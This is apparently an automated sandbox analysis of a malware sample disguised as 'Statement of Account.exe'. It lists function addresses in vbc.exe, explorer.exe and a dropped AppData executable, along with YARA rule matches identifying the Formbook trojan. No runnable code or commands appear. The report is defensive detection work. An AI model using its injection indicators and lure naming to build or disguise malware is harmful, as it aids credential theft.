          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0A3526_2_05D0A352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CD02C06_2_05CD02C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF02746_2_05CF0274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4ADE06_2_05C4ADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C68DBF6_2_05C68DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5AD006_2_05C5AD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CECD1F6_2_05CECD1F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C40CF26_2_05C40CF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF0CB56_2_05CF0CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50C006_2_05C50C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C42FC86_2_05C42FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CCEFA06_2_05CCEFA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC4F406_2_05CC4F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C92F286_2_05C92F28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C70F306_2_05C70F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF2F306_2_05CF2F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0EEDB6_2_05D0EEDB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0CE936_2_05D0CE93
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C62E906_2_05C62E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C50E596_2_05C50E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0EE266_2_05D0EE26
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C529A06_2_05C529A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D1A9A66_2_05D1A9A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C669626_2_05C66962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C7E8F06_2_05C7E8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C368B86_2_05C368B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C528406_2_05C52840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5A8406_2_05C5A840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D06BD76_2_05D06BD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0AB406_2_05D0AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C4EA806_2_05C4EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CED5B06_2_05CED5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D075716_2_05D07571
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C414606_2_05C41460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0F43F6_2_05D0F43F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0F7B06_2_05D0F7B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D016CC6_2_05D016CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C956306_2_05C95630
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C5B1B06_2_05C5B1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C8516C6_2_05C8516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3F1726_2_05C3F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D1B16B6_2_05D1B16B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CFF0CC6_2_05CFF0CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C570C06_2_05C570C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0F0E06_2_05D0F0E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D070E96_2_05D070E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C9739A6_2_05C9739A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C3D34C6_2_05C3D34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0132D6_2_05D0132D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6B2C06_2_05C6B2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF12ED6_2_05CF12ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6D2F06_2_05C6D2F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C552A06_2_05C552A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6FDC06_2_05C6FDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C53D406_2_05C53D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D01D5A6_2_05D01D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D07D736_2_05D07D73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0FCF26_2_05D0FCF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC9C326_2_05CC9C32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C13FD26_2_05C13FD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C13FD56_2_05C13FD5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C51F926_2_05C51F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0FFB16_2_05D0FFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0FF096_2_05D0FF09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C59EB06_2_05C59EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C599506_2_05C59950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6B9506_2_05C6B950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE59106_2_05CE5910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C538E06_2_05C538E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBD8006_2_05CBD800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C8DBF96_2_05C8DBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC5BF06_2_05CC5BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6FB806_2_05C6FB80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0FB766_2_05D0FB76
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CFDAC66_2_05CFDAC6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEDAAC6_2_05CEDAAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C95AA06_2_05C95AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF1AA36_2_05CF1AA3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D07A466_2_05D07A46
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0FA496_2_05D0FA49
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC3A6C6_2_05CC3A6C
          Source: C:\Windows\explorer.exeCode function: 7_2_0E5A12327_2_0E5A1232
          Source: C:\Windows\explorer.exeCode function: 7_2_0E59BB307_2_0E59BB30
          Source: C:\Windows\explorer.exeCode function: 7_2_0E59BB327_2_0E59BB32
          Source: C:\Windows\explorer.exeCode function: 7_2_0E5A00367_2_0E5A0036
          Source: C:\Windows\explorer.exeCode function: 7_2_0E5970827_2_0E597082
          Source: C:\Windows\explorer.exeCode function: 7_2_0E59E9127_2_0E59E912
          Source: C:\Windows\explorer.exeCode function: 7_2_0E598D027_2_0E598D02
          Source: C:\Windows\explorer.exeCode function: 7_2_0E5A45CD7_2_0E5A45CD
          Source: C:\Windows\explorer.exeCode function: 7_2_0E66A2327_2_0E66A232
          Source: C:\Windows\explorer.exeCode function: 7_2_0E664B327_2_0E664B32
          Source: C:\Windows\explorer.exeCode function: 7_2_0E664B307_2_0E664B30
          Source: C:\Windows\explorer.exeCode function: 7_2_0E6690367_2_0E669036
          Source: C:\Windows\explorer.exeCode function: 7_2_0E6600827_2_0E660082
          Source: C:\Windows\explorer.exeCode function: 7_2_0E661D027_2_0E661D02
          Source: C:\Windows\explorer.exeCode function: 7_2_0E6679127_2_0E667912
          Source: C:\Windows\explorer.exeCode function: 7_2_0E66D5CD7_2_0E66D5CD
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7F02327_2_0E7F0232
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7EF0367_2_0E7EF036
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7E60827_2_0E7E6082
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7EAB327_2_0E7EAB32
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7EAB307_2_0E7EAB30
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7ED9127_2_0E7ED912
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7E7D027_2_0E7E7D02
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7F35CD7_2_0E7F35CD
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6E4B327_2_0F6E4B32
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6E4B307_2_0F6E4B30
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6EA2327_2_0F6EA232
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6E1D027_2_0F6E1D02
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6E79127_2_0F6E7912
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6ED5CD7_2_0F6ED5CD
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6E90367_2_0F6E9036
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6E00827_2_0F6E0082
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeCode function: 8_2_0171D3848_2_0171D384
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeCode function: 8_2_075D0E888_2_075D0E88
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeCode function: 8_2_075D0E788_2_075D0E78
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeCode function: 8_2_07671D688_2_07671D68
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeCode function: 8_2_076794F88_2_076794F8
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeCode function: 8_2_076743A08_2_076743A0
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeCode function: 8_2_076719308_2_07671930
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeCode function: 8_2_076721A08_2_076721A0
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeCode function: 8_2_076739A08_2_076739A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E053512_2_055E0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E077012_2_055E0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0560475012_2_05604750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055FC6E012_2_055FC6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055D010012_2_055D0100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0562600012_2_05626000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055EE3F012_2_055EE3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_056602C012_2_056602C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055EED7A12_2_055EED7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055EAD0012_2_055EAD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E8DC012_2_055E8DC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055F8DBF12_2_055F8DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E0C0012_2_055E0C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055D0CF212_2_055D0CF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_05654F4012_2_05654F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_05622F2812_2_05622F28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_05600F3012_2_05600F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055D2FC812_2_055D2FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0565EFA012_2_0565EFA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E0E5912_2_055E0E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055F2ED912_2_055F2ED9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055F696212_2_055F6962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055EA84012_2_055EA840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0560E8F012_2_0560E8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055D28F012_2_055D28F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055C68F112_2_055C68F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0561889012_2_05618890
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E2A4512_2_055E2A45
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055DEA8012_2_055DEA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_056274E012_2_056274E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E349712_2_055E3497
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055EB73012_2_055EB730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0561516C12_2_0561516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055CF17212_2_055CF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055EB1B012_2_055EB1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E33F312_2_055E33F3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055FD2F012_2_055FD2F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E52A012_2_055E52A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E3D4012_2_055E3D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055FFDC012_2_055FFDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_05659C3212_2_05659C32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055F9C2012_2_055F9C20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E1F9212_2_055E1F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E9EB012_2_055E9EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E995012_2_055E9950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055FB95012_2_055FB950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055D197912_2_055D1979
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E59DA12_2_055E59DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0564D80012_2_0564D800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E38E012_2_055E38E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_05655BF012_2_05655BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0561DBF912_2_0561DBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055FFB8012_2_055FFB80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_05653A6C12_2_05653A6C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 05CBEA12 appears 86 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 05CCF290 appears 103 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 05C85130 appears 58 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 05C3B970 appears 262 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 0564EA12 appears 36 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 05C97E54 appears 107 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 05627E54 appears 95 times
          Source: Statement of Account.exe, 00000000.00000000.1699473233.0000000000B22000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFEAG.exe" vs Statement of Account.exe
          Source: Statement of Account.exe, 00000000.00000002.1735995485.0000000009250000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Statement of Account.exe
          Source: Statement of Account.exe, 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Statement of Account.exe
          Source: Statement of Account.exe, 00000000.00000002.1729055113.000000000106E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Statement of Account.exe
          Source: Statement of Account.exeBinary or memory string: OriginalFilenameFEAG.exe" vs Statement of Account.exe
          Source: Statement of Account.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
